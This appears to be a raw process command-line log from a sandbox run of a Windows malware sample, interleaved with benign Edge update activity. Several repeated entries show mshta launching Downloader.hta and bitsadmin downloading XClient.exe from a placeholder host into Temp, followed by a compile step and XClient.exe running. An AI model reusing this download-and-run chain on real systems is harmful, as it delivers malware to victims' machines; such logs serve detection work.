"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.97 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff649a688c0,0x7ff649a688cc,0x7ff649a688d8
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MEIwNUNBQjctRTQ3RC00OTQxLUEzMTktRDQ1OUI5QTE4MUMxfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntGMDI4NDM5Ny1ERDU5LTQ4NDQtOEJCNS0zQTRGMTQyNjQ4NER9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RDZqeFBlVW1LZmg4eXR5NkYwN1l4TTFlWkRIL1RWNkZRVDJmZkRpWnl3dz0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTI0LjAuMjQ3OC45NyIgbGFuZz0iIiBicmFuZD0iRVVXViIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEyODM4MzM1Mzg3IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyNzU5OTExMjgiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTcyNDIxMzgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8zMjc5OThlMy00MTM0LTRlYjEtYThlZi0xYTY3N2ZlMGIyNTk_UDE9MTcxNjQ3MDEwOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1XaSUyZlYxbmh4M1R1YVJ2cG5DN3VZZHJpdDFpWXMza2NOTlJtY0dzbEFZdnFNdlk0M3BMJTJmR0RHeXZQUXdBaG44NkI0eWMlMmJ0TjZlZHBvemZyNVJQV2olMmJRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTcyNDIxMzgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzMyNzk5OGUzLTQxMzQtNGViMS1hOGVmLTFhNjc3ZmUwYjI1OT9QMT0xNzE2NDcwMTA5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PVdpJTJmVjFuaHgzVHVhUnZwbkM3dVlkcml0MWlZczNrY05OUm1jR3NsQVl2cU12WTQzcEwlMmZHREd5dlBRd0Fobjg2QjR5YyUyYnRONmVkcG96ZnI1UlBXaiUyYlElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNzI4MjEwNjQiIHRvdGFsPSIxNzI4MjEwNjQiIGRvd25sb2FkX3RpbWVfbXM9IjI1ODc2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTczOTg1MTciIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzU3MTc3MzY5NSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM5OTk5NTM2NjMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSIyNzgxIiBkb3dubG9hZF90aW1lX21zPSIyODE0MSIgZG93bmxvYWRlZD0iMTcyODIxMDY0IiB0b3RhbD0iMTcyODIxMDY0IiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI0MjgxOCIvPjwvYXBwPjxhcHAgYXBwaWQ9InsxRkFCOENGRS05ODYwLTQxNUMtQTZDQS1BQTdEMTIwMjE5NDB9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIyLjAuMC4zNCIgbGFuZz0iIiBicmFuZD0iRVVGSSIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEyODM4MzM1Mzg3IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTI4MzgzMzUzODciIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyNjY3NzQxODkiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy81ZjE5NTYxMi0zODRhLTQ4ZWEtODQwOC1iNGVkZTlkYzU2YmI_UDE9MTcxNjQ3MDExMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1IYzNsN1RrQWpRdXdQa0FzWnJEUEplWlA5VU9HU0pBNDY4UU95dnNydXRBM1dYaTdVNzhhTlZ6bTczenRHbDc3M2wyanhOMTNyeWFKcTZzcGh5dFE0QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIxNiIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzMjY2Nzc0MTg5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy81ZjE5NTYxMi0zODRhLTQ4ZWEtODQwOC1iNGVkZTlkYzU2YmI_UDE9MTcxNjQ3MDExMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1IYzNsN1RrQWpRdXdQa0FzWnJEUEplWlA5VU9HU0pBNDY4UU95dnNydXRBM1dYaTdVNzhhTlZ6bTczenRHbDc3M2wyanhOMTNyeWFKcTZzcGh5dFE0QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE4MDQ0NDQ4IiB0b3RhbD0iMTgwNDQ0NDgiIGRvd25sb2FkX3RpbWVfbXM9IjQyNDUzIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyNjY5Mjg3NjkiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzI3MzE3ODY4MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzMjc1OTkxMTI4IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMjc4MSIgZG93bmxvYWRfdGltZV9tcz0iNDI4MTMiIGRvd25sb2FkZWQ9IjE4MDQ0NDQ4IiB0b3RhbD0iMTgwNDQ0NDgiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9IjI4MSIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\65c21cc89d7241d08029fd3d521a3d0d /t 3972 /p 1416
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\a284fa71977c4d07b165b4e01ea74755 /t 2528 /p 3036
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\bf7dfa9e02594b0ba45c304c5909f3aa /t 5924 /p 2748
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nwziktfv\nwziktfv.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA45.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc452407B64AF34E638FEE2B663DFEA14.TMP"
C:\Users\Admin\Desktop\XClient.exe
"C:\Users\Admin\Desktop\XClient.exe"
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\84e674974693413fb2da20541d821761 /t 5508 /p 4760
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\6ddd34487f6d4558aea4391e53af883e /t 3068 /p 5152
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\f3823bc9b97c462f89116c5ece3af7df /t 5792 /p 2436
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6878888c0,0x7ff6878888cc,0x7ff6878888d8
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6878888c0,0x7ff6878888cc,0x7ff6878888d8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff653c988c0,0x7ff653c988cc,0x7ff653c988d8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness
C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe
"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub prelaunch
C:\Windows\system32\wwahost.exe
"C:\Windows\system32\wwahost.exe" -ServerName:Microsoft.MicrosoftOfficeHub.wwa
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkVDOTVCOTQtRkJERS00OTU5LTg2RkItNTM1RTY2Q0NCNzBEfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntCQkQyNDYwMy0xMzE3LTQyNjUtQTMyRS03MkJDMTUxMzA2ODF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RDZqeFBlVW1LZmg4eXR5NkYwN1l4TTFlWkRIL1RWNkZRVDJmZkRpWnl3dz0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4Ny4zNyIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJJc09uSW50ZXJ2YWxDb21tYW5kc0FsbG93ZWQ9LXRhcmdldF9kZXY7UHJvZHVjdHNUb1JlZ2lzdGVyPSU3QjFGQUI4Q0ZFLTk4NjAtNDE1Qy1BNkNBLUFBN0QxMjAyMTk0MCU3RCIgaW5zdGFsbGFnZT0iMTkiIGNvaG9ydD0icnJmQDAuMDIiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMjAiIHJkPSI2MzI1IiBwaW5nX2ZyZXNobmVzcz0iezUyQ0QxQ0Y1LTIzMEYtNDQ4OS1BRUVBLTgwNjVBOEZBNDUzMn0iLz48L2FwcD48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTIuMC45MDIuNjciIG5leHR2ZXJzaW9uPSIxMjQuMC4yNDc4LjEwNSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIxOSIgaXNfcGlubmVkX3N5c3RlbT0idHJ1ZSIgbGFzdF9sYXV